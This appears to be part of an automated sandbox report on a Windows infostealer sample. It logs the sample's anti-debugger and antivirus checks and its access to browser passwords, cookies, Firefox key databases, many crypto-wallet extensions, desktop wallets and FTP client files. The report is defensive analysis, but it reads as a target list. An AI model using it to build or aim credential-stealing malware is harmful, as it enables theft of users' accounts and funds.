    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: SICE
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeProcess queried: DebugPortJump to behavior
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229036620.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Qyk8RJnGN7.exe, 00000000.00000003.986574444.0000000001526000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.999584270.000000000152D000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000003.983998868.0000000001526000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.986597414.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980321985.000000000152D000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.00000000014F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
